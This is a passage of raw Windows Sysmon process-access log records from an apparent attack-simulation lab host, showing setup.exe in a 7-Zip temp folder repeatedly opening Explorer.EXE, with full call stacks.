13:59:52.458{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015161Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.458{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015160Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.458{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015159Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015158Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015157Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015156Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015155Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015154Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015153Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015152Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015151Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015150Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015149Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015148Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015147Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015146Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015145Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dl